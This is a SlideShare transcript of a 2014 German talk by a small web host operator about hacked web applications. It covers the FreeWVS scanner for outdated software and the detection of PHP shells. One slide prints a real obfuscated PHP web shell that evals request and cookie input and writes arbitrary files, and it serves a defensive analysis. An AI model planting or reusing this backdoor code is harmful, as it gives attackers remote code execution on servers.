Your SlideShare is downloading. ×
0
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Gehackte Webapplikationen und Malware
Hanno B¨ock, Lizenz: CC0 / Public Domain
2014...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Vorstellung
Beispiel
Motivation
Veraltete Webanwendungen
Betreibe kleinen Webhoster...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Vorstellung
Beispiel
Motivation
Veraltete Webanwendungen
Your IP: x.x.x.x - Part of...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Vorstellung
Beispiel
Motivation
Veraltete Webanwendungen
Gehackte Webanwendungen be...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Vorstellung
Beispiel
Motivation
Veraltete Webanwendungen
Konkretes Beispiel war ein...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
FreeWVS
Schwierigkeiten beim Erkennen
User informieren
Entwicklung von FreeWVS
Prob...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
FreeWVS
Schwierigkeiten beim Erkennen
User informieren
Entwicklung von FreeWVS
Prob...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
FreeWVS
Schwierigkeiten beim Erkennen
User informieren
Entwicklung von FreeWVS
Prob...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
FreeWVS
Schwierigkeiten beim Erkennen
User informieren
Entwicklung von FreeWVS
Prob...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
FreeWVS
Schwierigkeiten beim Erkennen
User informieren
Entwicklung von FreeWVS
Prob...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Wenn es zu sp¨at ist
PHP-Shell
Von Hand erkennen
Malware erkennen
Offene Fragen
Bei ...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Wenn es zu sp¨at ist
PHP-Shell
Von Hand erkennen
Malware erkennen
Offene Fragen
$huq...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Wenn es zu sp¨at ist
PHP-Shell
Von Hand erkennen
Malware erkennen
Offene Fragen
Komb...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Wenn es zu sp¨at ist
PHP-Shell
Von Hand erkennen
Malware erkennen
Offene Fragen
Webr...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Wenn es zu sp¨at ist
PHP-Shell
Von Hand erkennen
Malware erkennen
Offene Fragen
Stra...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Sichere Webanwendungen
Wenn ihr Webanwendungen programmiert: Benutzt Prepared
State...
Einleitung
FreeWVS
Gehackt
Exkurs
Ende
Schlussfolgerung
Ein Großteil der Angriffe l¨asst sich durch aktuelle Software
verhi...
Upcoming SlideShare
Loading in...5
×

Gehackte Webapplikationen und Malware

230

Published on

Beliebte Webanwendungen und Content-Management-Systeme haben regelmäßig Sicherheitslücken. Nutzer müssen diese Anwendungen regelmäßig updaten, aber viele Betreiber von Webseiten sind sich dessen nicht bewusst. Im Rahmen des Betriebs von Servern mit einigen Hundert Kunden habe ich das Tool FreeWVS entwickelt, mit dem sich Webanwendungen mit bekannten Sicherheitslücken erkennen lassen. Wenn man Updates versäumt, tauchen fast zwangsweise irgendwann gehackte Webanwendungen auf. Diese aufzuspüren ist aber nicht unbedingt trivial. Wenn es zu spät ist, wird der eigene Server unter Umständen zur Spamschleuder oder wird für DDoS-Attacken missbraucht.

Published in: Internet
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
230
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Gehackte Webapplikationen und Malware"

  1. 1. Einleitung FreeWVS Gehackt Exkurs Ende Gehackte Webapplikationen und Malware Hanno B¨ock, Lizenz: CC0 / Public Domain 2014-04-11 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  2. 2. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software Zahlen: 2 Admins, ca. 300 Kunden, 1000 Domains, 1500 Web-Vhosts, 500 erkannte Webanwendungen Serverbetrieb f¨ur mich Nebenverdienst, hauptberuflich freier Journalist Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  3. 3. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Your IP: x.x.x.x - Part of Ababil/”No Problem Bro” DDOS attack We are contacting you on behalf of [...]. They are currently under a DDOS attack, that is being perpetuated from this host on your network: x.x.x.x They have so far seen this much traffic coming from the node: 107576316 bytes 1453734 packets This is part of the Operation Ababil, or ”It’s OK, No Problem Bro”, DDOS attack that is being sent upon various financial institutions in the United States. Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  4. 4. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Gehackte Webanwendungen bedeuten Streß - nicht nur f¨ur den Betreiber der Seite, sondern insbesondere auch f¨ur den Admin Serverlast steigt unerkl¨arlich Spam-Blacklisten ¨Ubergeordneter Provider beschwert sich und erwartet Reaktion Strafverfolgungsbeh¨orden (bei uns noch nie passiert) Brauchen Strategien f¨ur ganzen Server, nicht f¨ur einzelne Webseiten Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  5. 5. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Konkretes Beispiel war ein Joomla 1.7.0, damals ca. 1 Jahr alt Derartige Vorkommnisse verst¨arkt seit etwa 2012, davor fast nie Alle(!) derartigen Ereignisse bei uns mit hoher Wahrscheinlichkeit aufgrund von veralteten Webanwendungen Fazit: Updaten bevor etwas passiert ist die beste Strategie Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  6. 6. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute FreeWVS erkennt Webanwendungen und Version auf Dateisystemebene Enth¨alt eine Datenbank mit jeweils letzter Sicherheitsl¨ucke (wenn m¨oglich CVE, sonst URL) und sicherer Version Unterscheidet nicht nach schwere der Sicherheitsl¨ucke, betrachtet nur jeweils j¨ungstes Problem Python, freie Software (CC0) https://source.schokokeks.org/freewvs/ Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  7. 7. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Es gibt keine allgemeing¨ultige Strategie zum Erkennen von Webapps Versionsnummer nicht im Tarball, nur in Doku, nur gesplittet Seltsame Versionsnummernkonzepte (DokuWiki: 2013-12-08, auch schon gesehen: 1.2 neuer als 1.11) Oft unterschiedliche Erkennungsstrategien f¨ur unterschiedliche Major-Versionen Angenehm ist sowas: $wp version = ’3.8.2’; Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  8. 8. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute User k¨onnen sich wahlweise t¨aglich, w¨ochentlich oder monatlich informieren lassen Nicht abschaltbar! Problem: Wird h¨aufig ignoriert Vielen Usern nicht klar dass Webanwendungen betreut werden m¨ussen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  9. 9. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Bislang fast nur intern entwickelt, wenig Feedback von extern Update-Mechanismus nicht optimal (im Moment: svn up; make install) K¨onnten viel mehr Webanwendungen aufnehmen, insbesondere Plugins Patches welcome! Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  10. 10. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Fr¨uher: Webdesigner erstellt HTML-Seite Zwischendurch: Webdesigner erstellt PHP Heute: Webdesigner erstellt Theme f¨ur einfach zu bedienende, kostenlose Webanwendungen Problem: Wer k¨ummert sich um Updates? Oft: Niemand L¨osung manchmal: HTML-Dump von CMS Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  11. 11. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Bei uns bislang keine Defacements via SQL-Injection oder geklauten Zugangsdaten beobachtet (wir benutzen schon immer SFTP) Nur: Spam, DDoS-Attacken und (am h¨aufigsten) abgelegte PHP-Shells Oft: Grund f¨ur Angriff unklar, PHP-Shell ”f¨ur sp¨ater” Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  12. 12. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen $huqcyw = ”777564599393bc96823bdf64b6f221d5”; if(isset($ REQUEST[’epji’])) { $kumwnkyc = $ REQUEST[’epji’]; eval($kumwnkyc); exit(); } if(isset($ REQUEST[’qfwdstnd’])) { $rpjvrsf = $ REQUEST[’wuefsoa’]; $kopi = $ REQUEST[’qfwdstnd’]; $mzwjcpc = fopen($kopi, ’w’); $sshhbcz = fwrite($mzwjcpc, $rpjvrsf); fclose($mzwjcpc); echo $sshhbcz; exit(); eval ( base64 decode (”IGlmICggaXNz- ZXQoICRfQ09PS0lFWydkd2MnXSkgKSB7IGVjaG8gJzxjd2Q+ JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3Nld CAoICRfUE9TVFsncGU4MCddICkgKSB7IGV2YWwgKCBiYXNlNj RfZGVjb2RlICggJF9QT1NUWydwZTgwJ10gKSApOyByZXR1cm4 7IH0gIGlmICggaXNzZXQoICRfQ09PS0lFWydwZTgwJ10pICkg eyBldmFsICggYmFzZTY0X2RlY29kZSAoICRfQ09PS0lFWydwZ TgwJ10gKSApOyByZXR1cm47IH0g”) ); } Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  13. 13. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Kombinationen aus eval, gzinflate, base64 decode und ¨ahnlichem Problem: Oft auch sowas in legitimem PHP-Code (oft Themes) als Code-Obfuscation Decodieren: eval durch echo ersetzen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  14. 14. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Webroots mit ClamAV scannen - erkennt viel, aber l¨angst nicht alles LinuxMalwareDetect (maldet) - etwas umst¨andlich in der Bedienung, aber erkennt einiges Auch einige propriet¨are Virenscanner f¨ur Linux verf¨ugbar, kostenlos meist nur zum privatgebrauch Problem: Erkennungsrate praktisch immer unter 50 % Erstes Codebeispiel von vorhin: damals 0 auf Virustotal, jetzt 1/51 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  15. 15. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Strategien zur generischen Erkennung von PHP-Shells? Sollte nicht zu schwer sein, kenne aber keine Software. Wie / an wen Malware am besten reporten? Erkennen von Hacks in Form von Datenbankeintr¨agen / Artikeln / Defacements? Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  16. 16. Einleitung FreeWVS Gehackt Exkurs Ende Sichere Webanwendungen Wenn ihr Webanwendungen programmiert: Benutzt Prepared Statements und Content Security Policy! Konsequent eingesetzt verhindern Prepared Statements alle SQL-Injections und Content Security Policy alle Cross Site Scripting-Fehler - Großteil aller Web-Vulnerabilities Fehlerklassen verhindern statt einzelne Fehler Aber: H¨atte in meisten F¨allen bei uns vermutlich nichts gen¨utzt (Probleme mit File Upload oder Remote Code Execution) Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  17. 17. Einleitung FreeWVS Gehackt Exkurs Ende Schlussfolgerung Ein Großteil der Angriffe l¨asst sich durch aktuelle Software verhindern Angriffe verhindern ist immer besser als Angriffe sp¨ater erkennen M¨oglichkeiten angegriffene Webseiten zu finden unzuverl¨assig und unbefriedigend Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×